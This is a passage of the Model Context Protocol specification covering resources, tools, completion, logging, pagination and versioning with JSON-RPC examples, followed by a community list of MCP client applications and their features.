MCP servers **MAY** identify file:// resources with an
[XDG MIME type](https://specifications.freedesktop.org/shared-mime-info-spec/0.14/ar01s02.html#id-1.3.14),
like `inode/directory`, to represent non-regular files (such as directories) that don’t
otherwise have a standard MIME type.
### git://
Git version control integration.
### Custom URI Schemes
Custom URI schemes **MUST** be in accordance with [RFC3986](https://datatracker.ietf.org/doc/html/rfc3986),
taking the above guidance in to account.
## Error Handling
Servers **SHOULD** return standard JSON-RPC errors for common failure cases:
* Resource not found: `-32002`
* Internal errors: `-32603`
Example error:
```json theme={null}
{
"jsonrpc": "2.0",
"id": 5,
"error": {
"code": -32002,
"message": "Resource not found",
"data": {
"uri": "file:///nonexistent.txt"
}
}
}
```
## Security Considerations
1. Servers **MUST** validate all resource URIs
2. Access controls **SHOULD** be implemented for sensitive resources
3. Binary data **MUST** be properly encoded
4. Resource permissions **SHOULD** be checked before operations
# Tools
Source: https://modelcontextprotocol.io/specification/2025-11-25/server/tools
**Protocol Revision**: 2025-11-25
The Model Context Protocol (MCP) allows servers to expose tools that can be invoked by
language models. Tools enable models to interact with external systems, such as querying
databases, calling APIs, or performing computations. Each tool is uniquely identified by
a name and includes metadata describing its schema.
## User Interaction Model
Tools in MCP are designed to be **model-controlled**, meaning that the language model can
discover and invoke tools automatically based on its contextual understanding and the
user's prompts.
However, implementations are free to expose tools through any interface pattern that
suits their needs—the protocol itself does not mandate any specific user
interaction model.
For trust & safety and security, there **SHOULD** always
be a human in the loop with the ability to deny tool invocations.
Applications **SHOULD**:
* Provide UI that makes clear which tools are being exposed to the AI model
* Insert clear visual indicators when tools are invoked
* Present confirmation prompts to the user for operations, to ensure a human is in the
loop
## Capabilities
Servers that support tools **MUST** declare the `tools` capability:
```json theme={null}
{
"capabilities": {
"tools": {
"listChanged": true
}
}
}
```
`listChanged` indicates whether the server will emit notifications when the list of
available tools changes.
## Protocol Messages
### Listing Tools
To discover available tools, clients send a `tools/list` request. This operation supports
[pagination](/specification/2025-11-25/server/utilities/pagination).
**Request:**
```json theme={null}
{
"jsonrpc": "2.0",
"id": 1,
"method": "tools/list",
"params": {
"cursor": "optional-cursor-value"
}
}
```
**Response:**
```json theme={null}
{
"jsonrpc": "2.0",
"id": 1,
"result": {
"tools": [
{
"name": "get_weather",
"title": "Weather Information Provider",
"description": "Get current weather information for a location",
"inputSchema": {
"type": "object",
"properties": {
"location": {
"type": "string",
"description": "City name or zip code"
}
},
"required": ["location"]
},
"icons": [
{
"src": "https://example.com/weather-icon.png",
"mimeType": "image/png",
"sizes": ["48x48"]
}
]
}
],
"nextCursor": "next-page-cursor"
}
}
```
### Calling Tools
To invoke a tool, clients send a `tools/call` request:
**Request:**
```json theme={null}
{
"jsonrpc": "2.0",
"id": 2,
"method": "tools/call",
"params": {
"name": "get_weather",
"arguments": {
"location": "New York"
}
}
}
```
**Response:**
```json theme={null}
{
"jsonrpc": "2.0",
"id": 2,
"result": {
"content": [
{
"type": "text",
"text": "Current weather in New York:\nTemperature: 72°F\nConditions: Partly cloudy"
}
],
"isError": false
}
}
```
### List Changed Notification
When the list of available tools changes, servers that declared the `listChanged`
capability **SHOULD** send a notification:
```json theme={null}
{
"jsonrpc": "2.0",
"method": "notifications/tools/list_changed"
}
```
## Message Flow
```mermaid theme={null}
sequenceDiagram
participant LLM
participant Client
participant Server
Note over Client,Server: Discovery
Client->>Server: tools/list
Server-->>Client: List of tools
Note over Client,LLM: Tool Selection
LLM->>Client: Select tool to use
Note over Client,Server: Invocation
Client->>Server: tools/call
Server-->>Client: Tool result
Client->>LLM: Process result
Note over Client,Server: Updates
Server--)Client: tools/list_changed
Client->>Server: tools/list
Server-->>Client: Updated tools
```
## Data Types
### Tool
A tool definition includes:
* `name`: Unique identifier for the tool
* `title`: Optional human-readable name of the tool for display purposes.
* `description`: Human-readable description of functionality
* `icons`: Optional array of icons for display in user interfaces
* `inputSchema`: JSON Schema defining expected parameters
* Follows the [JSON Schema usage guidelines](/specification/2025-11-25/basic#json-schema-usage)
* Defaults to 2020-12 if no `$schema` field is present
* **MUST** be a valid JSON Schema object (not `null`)
* For tools with no parameters, use one of these valid approaches:
* `{ "type": "object", "additionalProperties": false }` - **Recommended**: explicitly accepts only empty objects
* `{ "type": "object" }` - accepts any object (including with properties)
* `outputSchema`: Optional JSON Schema defining expected output structure
* Follows the [JSON Schema usage guidelines](/specification/2025-11-25/basic#json-schema-usage)
* Defaults to 2020-12 if no `$schema` field is present
* `annotations`: Optional properties describing tool behavior
For trust & safety and security, clients **MUST** consider tool annotations to
be untrusted unless they come from trusted servers.
#### Tool Names
* Tool names **SHOULD** be between 1 and 128 characters in length (inclusive).
* Tool names **SHOULD** be considered case-sensitive.
* The following **SHOULD** be the only allowed characters: uppercase and lowercase ASCII letters (A-Z, a-z), digits
(0-9), underscore (\_), hyphen (-), and dot (.)
* Tool names **SHOULD NOT** contain spaces, commas, or other special characters.
* Tool names **SHOULD** be unique within a server.
* Example valid tool names:
* getUser
* DATA\_EXPORT\_v2
* admin.tools.list
### Tool Result
Tool results may contain [**structured**](#structured-content) or **unstructured** content.
**Unstructured** content is returned in the `content` field of a result, and can contain multiple content items of different types:
All content types (text, image, audio, resource links, and embedded resources)
support optional
[annotations](/specification/2025-11-25/server/resources#annotations) that
provide metadata about audience, priority, and modification times. This is the
same annotation format used by resources and prompts.
#### Text Content
```json theme={null}
{
"type": "text",
"text": "Tool result text"
}
```
#### Image Content
```json theme={null}
{
"type": "image",
"data": "base64-encoded-data",
"mimeType": "image/png",
"annotations": {
"audience": ["user"],
"priority": 0.9
}
}
```
#### Audio Content
```json theme={null}
{
"type": "audio",
"data": "base64-encoded-audio-data",
"mimeType": "audio/wav"
}
```
#### Resource Links
A tool **MAY** return links to [Resources](/specification/2025-11-25/server/resources), to provide additional context
or data. In this case, the tool will return a URI that can be subscribed to or fetched by the client:
```json theme={null}
{
"type": "resource_link",
"uri": "file:///project/src/main.rs",
"name": "main.rs",
"description": "Primary application entry point",
"mimeType": "text/x-rust"
}
```
Resource links support the same [Resource annotations](/specification/2025-11-25/server/resources#annotations) as regular resources to help clients understand how to use them.
Resource links returned by tools are not guaranteed to appear in the results
of a `resources/list` request.
#### Embedded Resources
[Resources](/specification/2025-11-25/server/resources) **MAY** be embedded to provide additional context
or data using a suitable [URI scheme](./resources#common-uri-schemes). Servers that use embedded resources **SHOULD** implement the `resources` capability:
```json theme={null}
{
"type": "resource",
"resource": {
"uri": "file:///project/src/main.rs",
"mimeType": "text/x-rust",
"text": "fn main() {\n println!(\"Hello world!\");\n}",
"annotations": {
"audience": ["user", "assistant"],
"priority": 0.7,
"lastModified": "2025-05-03T14:30:00Z"
}
}
}
```
Embedded resources support the same [Resource annotations](/specification/2025-11-25/server/resources#annotations) as regular resources to help clients understand how to use them.
#### Structured Content
**Structured** content is returned as a JSON object in the `structuredContent` field of a result.
For backwards compatibility, a tool that returns structured content SHOULD also return the serialized JSON in a TextContent block.
#### Output Schema
Tools may also provide an output schema for validation of structured results.
If an output schema is provided:
* Servers **MUST** provide structured results that conform to this schema.
* Clients **SHOULD** validate structured results against this schema.
Example tool with output schema:
```json theme={null}
{
"name": "get_weather_data",
"title": "Weather Data Retriever",
"description": "Get current weather data for a location",
"inputSchema": {
"type": "object",
"properties": {
"location": {
"type": "string",
"description": "City name or zip code"
}
},
"required": ["location"]
},
"outputSchema": {
"type": "object",
"properties": {
"temperature": {
"type": "number",
"description": "Temperature in celsius"
},
"conditions": {
"type": "string",
"description": "Weather conditions description"
},
"humidity": {
"type": "number",
"description": "Humidity percentage"
}
},
"required": ["temperature", "conditions", "humidity"]
}
}
```
Example valid response for this tool:
```json theme={null}
{
"jsonrpc": "2.0",
"id": 5,
"result": {
"content": [
{
"type": "text",
"text": "{\"temperature\": 22.5, \"conditions\": \"Partly cloudy\", \"humidity\": 65}"
}
],
"structuredContent": {
"temperature": 22.5,
"conditions": "Partly cloudy",
"humidity": 65
}
}
}
```
Providing an output schema helps clients and LLMs understand and properly handle structured tool outputs by:
* Enabling strict schema validation of responses
* Providing type information for better integration with programming languages
* Guiding clients and LLMs to properly parse and utilize the returned data
* Supporting better documentation and developer experience
### Schema Examples
#### Tool with default 2020-12 schema:
```json theme={null}
{
"name": "calculate_sum",
"description": "Add two numbers",
"inputSchema": {
"type": "object",
"properties": {
"a": { "type": "number" },
"b": { "type": "number" }
},
"required": ["a", "b"]
}
}
```
#### Tool with explicit draft-07 schema:
```json theme={null}
{
"name": "calculate_sum",
"description": "Add two numbers",
"inputSchema": {
"$schema": "http://json-schema.org/draft-07/schema#",
"type": "object",
"properties": {
"a": { "type": "number" },
"b": { "type": "number" }
},
"required": ["a", "b"]
}
}
```
#### Tool with no parameters:
```json theme={null}
{
"name": "get_current_time",
"description": "Returns the current server time",
"inputSchema": {
"type": "object",
"additionalProperties": false
}
}
```
## Error Handling
Tools use two error reporting mechanisms:
1. **Protocol Errors**: Standard JSON-RPC errors for issues like:
* Unknown tools
* Malformed requests (requests that fail to satisfy [CallToolRequest schema](/specification/2025-11-25/schema#calltoolrequest))
* Server errors
2. **Tool Execution Errors**: Reported in tool results with `isError: true`:
* API failures
* Input validation errors (e.g., date in wrong format, value out of range)
* Business logic errors
**Tool Execution Errors** contain actionable feedback that language models can use to self-correct and retry with adjusted parameters.
**Protocol Errors** indicate issues with the request structure itself that models are less likely to be able to fix.
Clients **SHOULD** provide tool execution errors to language models to enable self-correction.
Clients **MAY** provide protocol errors to language models, though these are less likely to result in successful recovery.
Example protocol error:
```json theme={null}
{
"jsonrpc": "2.0",
"id": 3,
"error": {
"code": -32602,
"message": "Unknown tool: invalid_tool_name"
}
}
```
Example tool execution error (input validation):
```json theme={null}
{
"jsonrpc": "2.0",
"id": 4,
"result": {
"content": [
{
"type": "text",
"text": "Invalid departure date: must be in the future. Current date is 08/08/2025."
}
],
"isError": true
}
}
```
## Security Considerations
1. Servers **MUST**:
* Validate all tool inputs
* Implement proper access controls
* Rate limit tool invocations
* Sanitize tool outputs
2. Clients **SHOULD**:
* Prompt for user confirmation on sensitive operations
* Show tool inputs to the user before calling the server, to avoid malicious or
accidental data exfiltration
* Validate tool results before passing to LLM
* Implement timeouts for tool calls
* Log tool usage for audit purposes
# Completion
Source: https://modelcontextprotocol.io/specification/2025-11-25/server/utilities/completion
**Protocol Revision**: 2025-11-25
The Model Context Protocol (MCP) provides a standardized way for servers to offer
autocompletion suggestions for the arguments of prompts and resource templates. When
users are filling in argument values for a specific prompt (identified by name) or
resource template (identified by URI), servers can provide contextual suggestions.
## User Interaction Model
Completion in MCP is designed to support interactive user experiences similar to IDE code
completion.
For example, applications may show completion suggestions in a dropdown or popup menu as
users type, with the ability to filter and select from available options.
However, implementations are free to expose completion through any interface pattern that
suits their needs—the protocol itself does not mandate any specific user
interaction model.
## Capabilities
Servers that support completions **MUST** declare the `completions` capability:
```json theme={null}
{
"capabilities": {
"completions": {}
}
}
```
## Protocol Messages
### Requesting Completions
To get completion suggestions, clients send a `completion/complete` request specifying
what is being completed through a reference type:
**Request:**
```json theme={null}
{
"jsonrpc": "2.0",
"id": 1,
"method": "completion/complete",
"params": {
"ref": {
"type": "ref/prompt",
"name": "code_review"
},
"argument": {
"name": "language",
"value": "py"
}
}
}
```
**Response:**
```json theme={null}
{
"jsonrpc": "2.0",
"id": 1,
"result": {
"completion": {
"values": ["python", "pytorch", "pyside"],
"total": 10,
"hasMore": true
}
}
}
```
For prompts or URI templates with multiple arguments, clients should include previous completions in the `context.arguments` object to provide context for subsequent requests.
**Request:**
```json theme={null}
{
"jsonrpc": "2.0",
"id": 1,
"method": "completion/complete",
"params": {
"ref": {
"type": "ref/prompt",
"name": "code_review"
},
"argument": {
"name": "framework",
"value": "fla"
},
"context": {
"arguments": {
"language": "python"
}
}
}
}
```
**Response:**
```json theme={null}
{
"jsonrpc": "2.0",
"id": 1,
"result": {
"completion": {
"values": ["flask"],
"total": 1,
"hasMore": false
}
}
}
```
### Reference Types
The protocol supports two types of completion references:
| Type | Description | Example |
| -------------- | --------------------------- | --------------------------------------------------- |
| `ref/prompt` | References a prompt by name | `{"type": "ref/prompt", "name": "code_review"}` |
| `ref/resource` | References a resource URI | `{"type": "ref/resource", "uri": "file:///{path}"}` |
### Completion Results
Servers return an array of completion values ranked by relevance, with:
* Maximum 100 items per response
* Optional total number of available matches
* Boolean indicating if additional results exist
## Message Flow
```mermaid theme={null}
sequenceDiagram
participant Client
participant Server
Note over Client: User types argument
Client->>Server: completion/complete
Server-->>Client: Completion suggestions
Note over Client: User continues typing
Client->>Server: completion/complete
Server-->>Client: Refined suggestions
```
## Data Types
### CompleteRequest
* `ref`: A `PromptReference` or `ResourceReference`
* `argument`: Object containing:
* `name`: Argument name
* `value`: Current value
* `context`: Object containing:
* `arguments`: A mapping of already-resolved argument names to their values.
### CompleteResult
* `completion`: Object containing:
* `values`: Array of suggestions (max 100)
* `total`: Optional total matches
* `hasMore`: Additional results flag
## Error Handling
Servers **SHOULD** return standard JSON-RPC errors for common failure cases:
* Method not found: `-32601` (Capability not supported)
* Invalid prompt name: `-32602` (Invalid params)
* Missing required arguments: `-32602` (Invalid params)
* Internal errors: `-32603` (Internal error)
## Implementation Considerations
1. Servers **SHOULD**:
* Return suggestions sorted by relevance
* Implement fuzzy matching where appropriate
* Rate limit completion requests
* Validate all inputs
2. Clients **SHOULD**:
* Debounce rapid completion requests
* Cache completion results where appropriate
* Handle missing or partial results gracefully
## Security
Implementations **MUST**:
* Validate all completion inputs
* Implement appropriate rate limiting
* Control access to sensitive suggestions
* Prevent completion-based information disclosure
# Logging
Source: https://modelcontextprotocol.io/specification/2025-11-25/server/utilities/logging
**Protocol Revision**: 2025-11-25
The Model Context Protocol (MCP) provides a standardized way for servers to send
structured log messages to clients. Clients can control logging verbosity by setting
minimum log levels, with servers sending notifications containing severity levels,
optional logger names, and arbitrary JSON-serializable data.
## User Interaction Model
Implementations are free to expose logging through any interface pattern that suits their
needs—the protocol itself does not mandate any specific user interaction model.
## Capabilities
Servers that emit log message notifications **MUST** declare the `logging` capability:
```json theme={null}
{
"capabilities": {
"logging": {}
}
}
```
## Log Levels
The protocol follows the standard syslog severity levels specified in
[RFC 5424](https://datatracker.ietf.org/doc/html/rfc5424#section-6.2.1):
| Level | Description | Example Use Case |
| --------- | -------------------------------- | -------------------------- |
| debug | Detailed debugging information | Function entry/exit points |
| info | General informational messages | Operation progress updates |
| notice | Normal but significant events | Configuration changes |
| warning | Warning conditions | Deprecated feature usage |
| error | Error conditions | Operation failures |
| critical | Critical conditions | System component failures |
| alert | Action must be taken immediately | Data corruption detected |
| emergency | System is unusable | Complete system failure |
## Protocol Messages
### Setting Log Level
To configure the minimum log level, clients **MAY** send a `logging/setLevel` request:
**Request:**
```json theme={null}
{
"jsonrpc": "2.0",
"id": 1,
"method": "logging/setLevel",
"params": {
"level": "info"
}
}
```
### Log Message Notifications
Servers send log messages using `notifications/message` notifications:
```json theme={null}
{
"jsonrpc": "2.0",
"method": "notifications/message",
"params": {
"level": "error",
"logger": "database",
"data": {
"error": "Connection failed",
"details": {
"host": "localhost",
"port": 5432
}
}
}
}
```
## Message Flow
```mermaid theme={null}
sequenceDiagram
participant Client
participant Server
Note over Client,Server: Configure Logging
Client->>Server: logging/setLevel (info)
Server-->>Client: Empty Result
Note over Client,Server: Server Activity
Server--)Client: notifications/message (info)
Server--)Client: notifications/message (warning)
Server--)Client: notifications/message (error)
Note over Client,Server: Level Change
Client->>Server: logging/setLevel (error)
Server-->>Client: Empty Result
Note over Server: Only sends error level and above
```
## Error Handling
Servers **SHOULD** return standard JSON-RPC errors for common failure cases:
* Invalid log level: `-32602` (Invalid params)
* Configuration errors: `-32603` (Internal error)
## Implementation Considerations
1. Servers **SHOULD**:
* Rate limit log messages
* Include relevant context in data field
* Use consistent logger names
* Remove sensitive information
2. Clients **MAY**:
* Present log messages in the UI
* Implement log filtering/search
* Display severity visually
* Persist log messages
## Security
1. Log messages **MUST NOT** contain:
* Credentials or secrets
* Personal identifying information
* Internal system details that could aid attacks
2. Implementations **SHOULD**:
* Rate limit messages
* Validate all data fields
* Control log access
* Monitor for sensitive content
# Pagination
Source: https://modelcontextprotocol.io/specification/2025-11-25/server/utilities/pagination
**Protocol Revision**: 2025-11-25
The Model Context Protocol (MCP) supports paginating list operations that may return
large result sets. Pagination allows servers to yield results in smaller chunks rather
than all at once.
Pagination is especially important when connecting to external services over the
internet, but also useful for local integrations to avoid performance issues with large
data sets.
## Pagination Model
Pagination in MCP uses an opaque cursor-based approach, instead of numbered pages.
* The **cursor** is an opaque string token, representing a position in the result set
* **Page size** is determined by the server, and clients **MUST NOT** assume a fixed page
size
## Response Format
Pagination starts when the server sends a **response** that includes:
* The current page of results
* An optional `nextCursor` field if more results exist
```json theme={null}
{
"jsonrpc": "2.0",
"id": "123",
"result": {
"resources": [...],
"nextCursor": "eyJwYWdlIjogM30="
}
}
```
## Request Format
After receiving a cursor, the client can *continue* paginating by issuing a request
including that cursor:
```json theme={null}
{
"jsonrpc": "2.0",
"id": "124",
"method": "resources/list",
"params": {
"cursor": "eyJwYWdlIjogMn0="
}
}
```
## Pagination Flow
```mermaid theme={null}
sequenceDiagram
participant Client
participant Server
Client->>Server: List Request (no cursor)
loop Pagination Loop
Server-->>Client: Page of results + nextCursor
Client->>Server: List Request (with cursor)
end
```
## Operations Supporting Pagination
The following MCP operations support pagination:
* `resources/list` - List available resources
* `resources/templates/list` - List resource templates
* `prompts/list` - List available prompts
* `tools/list` - List available tools
## Implementation Guidelines
1. Servers **SHOULD**:
* Provide stable cursors
* Handle invalid cursors gracefully
2. Clients **SHOULD**:
* Treat a missing `nextCursor` as the end of results
* Support both paginated and non-paginated flows
3. Clients **MUST** treat cursors as opaque tokens:
* Don't make assumptions about cursor format
* Don't attempt to parse or modify cursors
* Don't persist cursors across sessions
## Error Handling
Invalid cursors **SHOULD** result in an error with code -32602 (Invalid params).
# Versioning
Source: https://modelcontextprotocol.io/specification/versioning
The Model Context Protocol uses string-based version identifiers following the format
`YYYY-MM-DD`, to indicate the last date backwards incompatible changes were made.
The protocol version will *not* be incremented when the
protocol is updated, as long as the changes maintain backwards compatibility. This allows
for incremental improvements while preserving interoperability.
## Revisions
Revisions may be marked as:
* **Draft**: in-progress specifications, not yet ready for consumption.
* **Current**: the current protocol version, which is ready for use and may continue to
receive backwards compatible changes.
* **Final**: past, complete specifications that will not be changed.
The **current** protocol version is [**2025-11-25**](/specification/2025-11-25/).
## Negotiation
Version negotiation happens during
[initialization](/specification/latest/basic/lifecycle#initialization). Clients and
servers **MAY** support multiple protocol versions simultaneously, but they **MUST**
agree on a single version to use for the session.
The protocol provides appropriate error handling if version negotiation fails, allowing
clients to gracefully terminate connections when they cannot find a version compatible
with the server.
# Example Clients
Source: https://modelcontextprotocol.io/clients
A list of applications that support MCP integrations
This page provides an overview of applications that support the Model Context Protocol (MCP). Each client may support different MCP features, allowing for varying levels of integration with MCP servers.
This list is maintained by the community. If you notice any inaccuracies or would like to update information about MCP support in your application, please submit a pull request or [open an issue in our documentation repository](https://github.com/modelcontextprotocol/modelcontextprotocol/issues).
## Client details
5ire is an open source cross-platform desktop AI assistant that supports tools through MCP servers.
**Key features:**
* Built-in MCP servers can be quickly enabled and disabled.
* Users can add more servers by modifying the configuration file.
* It is open-source and user-friendly, suitable for beginners.
* Future support for MCP will be continuously improved.
AgentAI is a Rust library designed to simplify the creation of AI agents. The library includes seamless integration with MCP Servers.
**Key features:**
* Multi-LLM – We support most LLM APIs (OpenAI, Anthropic, Gemini, Ollama, and all OpenAI API Compatible).
* Built-in support for MCP Servers.
* Create agentic flows in a type- and memory-safe language like Rust.
**Learn more:**
* [Example of MCP Server integration](https://github.com/AdamStrojek/rust-agentai/blob/master/examples/tools_mcp.rs)
AgenticFlow is a no-code AI platform that helps you build agents that handle sales, marketing, and creative tasks around the clock. Connect 2,500+ APIs and 10,000+ tools securely via MCP.
**Key features:**
* No-code AI agent creation and workflow building.
* Access a vast library of 10,000+ tools and 2,500+ APIs through MCP.
* Simple 3-step process to connect MCP servers.
* Securely manage connections and revoke access anytime.
**Learn more:**
* [AgenticFlow MCP Integration](https://agenticflow.ai/mcp)
AIQL TUUI is a native, cross-platform desktop AI chat application with MCP support. It supports multiple AI providers (e.g., Anthropic, Cloudflare, Deepseek, OpenAI, Qwen), local AI models (via vLLM, Ray, etc.), and aggregated API platforms (such as Deepinfra, Openrouter, and more).
**Key features:**
* **Dynamic LLM API & Agent Switching**: Seamlessly toggle between different LLM APIs and agents on the fly.
* **Comprehensive Capabilities Support**: Built-in support for tools, prompts, resources, and sampling methods.
* **Configurable Agents**: Enhanced flexibility with selectable and customizable tools via agent settings.
* **Advanced Sampling Control**: Modify sampling parameters and leverage multi-round sampling for optimal results.
* **Cross-Platform Compatibility**: Fully compatible with macOS, Windows, and Linux.
* **Free & Open-Source (FOSS)**: Permissive licensing allows modifications and custom app bundling.
**Learn more:**
* [TUUI document](https://www.tuui.com/)
* [AIQL GitHub repository](https://github.com/AI-QL)
Amazon Q CLI is an open-source, agentic coding assistant for terminals.
**Key features:**
* Full support for MCP servers.
* Edit prompts using your preferred text editor.
* Access saved prompts instantly with `@`.
* Control and organize AWS resources directly from your terminal.
* Tools, profiles, context management, auto-compact, and so much more!
**Get Started**
```bash theme={null}
brew install amazon-q
```
Amazon Q IDE is an open-source, agentic coding assistant for IDEs.
**Key features:**
* Support for the VSCode, JetBrains, Visual Studio, and Eclipse IDEs.
* Control and organize AWS resources directly from your IDE.
* Manage permissions for each MCP tool via the IDE user interface.
Amp is an agentic coding tool built by Sourcegraph. It runs in VS Code (and compatible forks like Cursor, Windsurf, and VSCodium), JetBrains IDEs, Neovim, and as a command-line tool. It's also multiplayer — you can share threads and collaborate with your team.
**Key features:**
* Granular control over enabled tools and permissions
* Support for MCP servers defined in VS Code `mcp.json`
Apify MCP Tester is an open-source client that connects to any MCP server using Server-Sent Events (SSE).
It is a standalone Apify Actor designed for testing MCP servers over SSE, with support for Authorization headers.
It uses plain JavaScript (old-school style) and is hosted on Apify, allowing you to run it without any setup.
**Key features:**
* Connects to any MCP server via SSE.
* Works with the [Apify MCP Server](https://mcp.apify.com) to interact with one or more Apify [Actors](https://apify.com/store).
* Dynamically utilizes tools based on context and user queries (if supported by the server).
Augment Code is an AI-powered coding platform for VS Code and JetBrains with autonomous agents, chat, and completions. Both local and remote agents are backed by full codebase awareness and native support for MCP, enabling enhanced context through external sources and tools.
**Key features:**
* Full MCP support in local and remote agents.
* Add additional context through MCP servers.
* Automate your development workflows with MCP tools.
* Works in VS Code and JetBrains IDEs.
Avatar-Shell is an electron-based MCP client application that prioritizes avatar conversations and media output such as images.
**Key features:**
* MCP tools and resources can be used
* Supports avatar-to-avatar communication via socket.io.
* Supports the mixed use of multiple LLM APIs.
* The daemon mechanism allows for flexible scheduling.
BeeAI Framework is an open-source framework for building, deploying, and serving powerful agentic workflows at scale. The framework includes the **MCP Tool**, a native feature that simplifies the integration of MCP servers into agentic workflows.
**Key features:**
* Seamlessly incorporate MCP tools into agentic workflows.
* Quickly instantiate framework-native tools from connected MCP client(s).
* Planned future support for agentic MCP capabilities.
**Learn more:**
* [Example of using MCP tools in agentic workflow](https://i-am-bee.github.io/beeai-framework/#/typescript/tools?id=using-the-mcptool-class)
BoltAI is a native, all-in-one AI chat client with MCP support. BoltAI supports multiple AI providers (OpenAI, Anthropic, Google AI...), including local AI models (via Ollama, LM Studio or LMX)
**Key features:**
* MCP Tool integrations: once configured, user can enable individual MCP server in each chat
* MCP quick setup: import configuration from Claude Desktop app or Cursor editor
* Invoke MCP tools inside any app with AI Command feature
* Integrate with remote MCP servers in the mobile app
**Learn more:**
* [BoltAI docs](https://boltai.com/docs/plugins/mcp-servers)
* [BoltAI website](https://boltai.com)
Call Chirp uses AI to capture every critical detail from your business conversations, automatically syncing insights to your CRM and project tools so you never miss another deal-closing moment.
**Key features:**
* Save transcriptions from Zoom, Google Meet, and more
* MCP Tools for voice AI agents
* Remote MCP servers support
Chatbox is a better UI and desktop app for ChatGPT, Claude, and other LLMs, available on Windows, Mac, Linux, and the web. It's open-source and has garnered 37K stars on GitHub.
**Key features:**
* Tools support for MCP servers
* Support both local and remote MCP servers
* Built-in MCP servers marketplace
ChatFrame is a cross-platform desktop chatbot that unifies access to multiple AI language models, supports custom tool integration via MCP servers, and enables RAG conversations with your local files—all in a single, polished app for macOS and Windows.
**Key features:**
* Unified access to top LLM providers (OpenAI, Anthropic, DeepSeek, xAI, and more) in one interface
* Built-in retrieval-augmented generation (RAG) for instant, private search across your PDFs, text, and code files
* Plug-in system for custom tools via Model Context Protocol (MCP) servers
* Multimodal chat: supports images, text, and live interactive artifacts
ChatGPT is OpenAI's AI assistant that provides MCP support for remote servers to conduct deep research.
**Key features:**
* Support for MCP via connections UI in settings
* Access to search tools from configured MCP servers for deep research
* Enterprise-grade security and compliance features
ChatWise is a desktop-optimized, high-performance chat application that lets you bring your own API keys. It supports a wide range of LLMs and integrates with MCP to enable tool workflows.
**Key features:**
* Tools support for MCP servers
* Offer built-in tools like web search, artifacts and image generation.
Chorus is a native Mac app for chatting with AIs. Chat with multiple models at once, run tools and MCPs, create projects, quick chat, bring your own key, all in a blazing fast, keyboard shortcut friendly app.
**Key features:**
* MCP support with one-click install
* Built in tools, like web search, terminal, and image generation
* Chat with multiple models at once (cloud or local)
* Create projects with scoped memory
* Quick chat with an AI that can see your screen
Claude Code is an interactive agentic coding tool from Anthropic that helps you code faster through natural language commands. It supports MCP integration for resources, prompts, tools, and roots, and also functions as an MCP server to integrate with other clients.
**Key features:**
* Full support for resources, prompts, tools, and roots from MCP servers
* Offers its own tools through an MCP server for integrating with other MCP clients
Claude Desktop provides comprehensive support for MCP, enabling deep integration with local tools and data sources.
**Key features:**
* Full support for resources, allowing attachment of local files and data
* Support for prompt templates
* Tool integration for executing commands and scripts
* Local server connections for enhanced privacy and security
Claude.ai is Anthropic's web-based AI assistant that provides MCP support for remote servers.
**Key features:**
* Support for remote MCP servers via integrations UI in settings
* Access to tools, prompts, and resources from configured MCP servers
* Seamless integration with Claude's conversational interface
* Enterprise-grade security and compliance features
Cline is an autonomous coding agent in VS Code that edits files, runs commands, uses a browser, and more–with your permission at each step.
**Key features:**
* Create and add tools through natural language (e.g. "add a tool that searches the web")
* Share custom MCP servers Cline creates with others via the `~/Documents/Cline/MCP` directory
* Displays configured MCP servers along with their tools, resources, and any error logs
CodeGPT is a popular VS Code and Jetbrains extension that brings AI-powered coding assistance to your editor. It supports integration with MCP servers for tools, allowing users to leverage external AI capabilities directly within their development workflow.
**Key features:**
* Use MCP tools from any configured MCP server
* Seamless integration with VS Code and Jetbrains UI
* Supports multiple LLM providers and custom endpoints
**Learn more:**
* [CodeGPT Documentation](https://docs.codegpt.co/)
Codex is a lightweight AI-powered coding agent from OpenAI that runs in your terminal.
**Key features:**
* Support for MCP tools (listing and invocation)
* Support for MCP resources (list, read, and templates)
* Elicitation support (routes requests to TUI for user input)
* Supports STDIO and HTTP streaming transports with OAuth
* Also available as VS Code extension
Continue is an open-source AI code assistant, with built-in support for all MCP features.
**Key features:**
* Type "@" to mention MCP resources
* Prompt templates surface as slash commands
* Use both built-in and MCP tools directly in chat
* Supports VS Code and JetBrains IDEs, with any LLM
Copilot-MCP enables AI coding assistance via MCP.
**Key features:**
* Support for MCP tools and resources
* Integration with development workflows
* Extensible AI capabilities
Cursor is an AI code editor.
**Key features:**
* Support for MCP tools in Cursor Composer
* Support for roots
* Support for prompts
* Support for elicitation
* Support for both STDIO and SSE
Daydreams is a generative agent framework for executing anything onchain
**Key features:**
* Supports MCP Servers in config
* Exposes MCP Client
ECA is a Free and open-source editor-agnostic tool that aims to easily link LLMs and Editors, giving the best UX possible for AI pair programming using a well-defined protocol
**Key features:**
* **Editor-agnostic**: protocol for any editor to integrate.
* **Single configuration**: Configure eca making it work the same in any editor via global or local configs.
* **Chat** interface: ask questions, review code, work together to code.
* **Agentic**: let LLM work as an agent with its native tools and MCPs you can configure.
* **Context**: support: giving more details about your code to the LLM, including MCP resources and prompts.
* **Multi models**: Login to OpenAI, Anthropic, Copilot, Ollama local models and many more.
* **OpenTelemetry**: Export metrics of tools, prompts, server usage.
Emacs Mcp is an Emacs client designed to interface with MCP servers, enabling seamless connections and interactions. It provides MCP tool invocation support for AI plugins like [gptel](https://github.com/karthink/gptel) and [llm](https://github.com/ahyatt/llm), adhering to Emacs' standard tool invocation format. This integration enhances the functionality of AI tools within the Emacs ecosystem.
**Key features:**
* Provides MCP tool support for Emacs.
fast-agent is a Python Agent framework, with simple declarative support for creating Agents and Workflows, with full multi-modal support for Anthropic and OpenAI models.
**Key features:**
* PDF and Image support, based on MCP Native types
* Interactive front-end to develop and diagnose Agent applications, including passthrough and playback simulators
* Built in support for "Building Effective Agents" workflows.
* Deploy Agents as MCP Servers
Firebender is an IntelliJ plugin that offers a world-class coding agent with MCP integration for tool calling.
**Key features:**
* Tool integration for executing commands and scripts via STDIO, SSE indirectly supported via mcp-remote npm package.
* Local server connections for enhanced privacy and security
* MCPs can be installed via project rules or local workstation rules files.
* Individual tools within MCPs can be turned off.
FlowDown is a blazing fast and smooth client app for using AI/LLM, with a strong emphasis on privacy and user experience. It supports MCP servers to extend its capabilities with external tools, allowing users to build powerful, customized workflows.
**Key features:**
* **Seamless MCP Integration**: Easily connect to MCP servers to utilize a wide range of external tools.
* **Privacy-First Design**: Your data stays on your device. We don't collect any user data, ensuring complete privacy.
* **Lightweight & Efficient**: A compact and optimized design ensures a smooth and responsive experience with any AI model.
* **Broad Compatibility**: Works with all OpenAI-compatible service providers and supports local offline models through MLX.
